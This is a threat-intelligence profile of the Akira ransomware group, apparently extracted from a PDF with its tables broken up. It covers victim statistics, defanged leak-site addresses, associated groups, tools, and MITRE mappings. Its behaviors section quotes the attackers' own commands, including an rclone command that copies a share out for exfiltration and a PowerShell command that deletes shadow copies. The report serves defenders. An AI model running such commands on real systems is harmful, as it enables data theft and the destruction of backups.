Akira Ransomware Threat Profile - Adversary Pursuit Group Blackpoint Cyber - 2024Q3
Akira Ransomware Threat Profile - Adversary Pursuit Group Blackpoint Cyber - 2024Q3
Akira
Ransomware
Table of Contents Executive Summary 2
Description 3
Previous Targets: Akira
Previous Industry Targets
Previous Victim HQ Regions
4
Data Leak Site: Akira 6
Known Exploited Vulnerabilities
7
Associations: Akira
8
Known Tools: Akira
10
Observed Akira Behaviors
Windows
Linux
15
MITRE ATT&CK® Mappings: Akira
19
References
25
Construction &
Engineering: 22
Industrials 95 Manufacturing: 44
Transportation: 13
Other: 16
Hotels & Entertainment: 10
Consumer Cyclicals 36 Retail: 13
Other: 13
MSPs: 1
Technology 26 Telecommunications: 10
Other: 15
Business Services: 8
Professional & Commercial Services 23 Legal Services: 11
Other: 4
Academics 14
Consumer Non-Cyclicals 9
Energy 6
Real Estate 6
Healthcare 6
Insurance: 2
Financials 4 Other: 2
Basic Materials 2
Utilities 1
Government 1
0 20 40 60 80 100
# of Incidents
Europe 47
South America 12
84
Oceania 8
Asia 4
Africa 1
# of Incidents
hxxps://akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad[.]onion/
hxxps://akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id[.]onion/
Gold Sahara
Akira alias used by SecureWorks.
IQOJ Ransomware
A new variant of the Akira ransomware observed in 2023.
Megazord Ransomware
A new variant of the Akira ransomware observed in August 2023.
ZHQ Ransomware
A new variant of the Akira ransomware observed in 2023.
Exotic Lily
A financially motivated threat group that has been known to act as an initial access broker for other
malicious actors, including Akira ransomware operators.
xanonymoux
In November 2023, security researchers reported that prior victims of Akira ransomware were
contacted by an entity identifying themselves as “xanonymoux.” The entity claimed to have
obtained access to a server hosting the victim’s data exfiltrated by Akira. The entity then attempted
to extort the victim for additional funds to provide access to the purported server or delete the
data. The connection between Akira and xanonymoux remains unknown; however, other operations
have been observed using additional extortion methods similar to this tactic.
Conti Ransomware
Security researchers have reported that the Akira ransomware variant bears resemblance to the
Conti ransomware builder that was leaked in 2022. Akira ignores the same file types and
directories as Contri and has similar functions. Additionally, Akira ransomware transactions overlap
with Conti threat actors on multiple occasions. In, at least, three separate transactions, Akira sent
the full amount of their ransom payments to Conti affiliated addresses.
decrypt.py A script used for decrypting password data from Fortinet devices.
A tool that can locate and retrieve Windows Data Protection API
DonPAPI
(DPAPI) protected credentials, aka DPAPI dumping.
An IT discovery & inventory platform that delivers insights into the status
LANSweeper
of users, devices, and software within IT environments.
LSASS A Windows process that takes care of security policy for the OS.
A port scanner that can detect whether ports are open, complete the TCP
MASSCAN connection and interaction with the application at that port to grab simple
banner information.
A toolkit for Windows with various powerful features for kernel structure
PC Hunter
viewing and manipulating.
A security tool that scans and analyzes files at kernel level; can help
PowerTool
threat actors remove and disable security services/software.
A command line program for syncing files with cloud storage services
Rclone
such as Dropbox, Google Drive, Amazon S3, and MEGA.
WebBrowserPas A password recovery tool that reveals the passwords stored by web
sView browsers.
A trialware file archiver utility for Windows devices that can backup data
and reduce the size of email attachments, open and unpack RAR, ZIP
WinRAR
and other files downloaded from Internet, and create new archives in
RAR and ZIP file format.
A free and open-source SFTP, FTP, WebDAV, S3, and SCP client for
WinSCP
Windows that can be used to exfiltrate files to a remote server.
"C:\Users\<user>\Downloads\winrar-x64-623.exe"
rclone copy \\192.168.XXX.214\f$ st:"/home/.../.../F" --max-age 1y --
Exfiltration
exclude "*. [excluded files] -q --ignore-existing --auto-confirm --
multi-thread-streams 25 --transfers 25 –P
C:\w[.]exe
C:\Users\install\Downloads\w[.]exe
\\192.168.XXX.37\c$\w[.]exe
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy |
Impact
Remove-WmiObject"
start 1.exe -p="\\<redacted> \C$" -n=10
start 1.exe -p="\\ <redacted> \ <redacted>$" -n=10
start 1.exe -p="\\ <redacted> \D$" -n=10
CryptAcquireContextW()
CryptImportPublicKeyInfo()
Encryption
CryptGenRandom()
CryptEncrypt()
Akira
Reconnaissance
Resource Development
Initial Access
Execution
.001: PowerShell
T1059: Command and Scripting Interpreter .002: AppleScript
.003: Windows Command Shell
Akira
Execution
Persistence
Privilege Escalation
Defense Evasion
Akira
Defense Evasion
T1222: File and Directory Permissions .001: Windows File and Directory Permissions
Modification Modification
Credential Access
T1555: Credentials from Password Stores .003: Credentials from Web Browsers
Discovery
Akira
Discovery
Lateral Movement
Akira
Lateral Movement
Collection
T1090: Proxy
Exfiltration
Akira
Exfiltration
Impact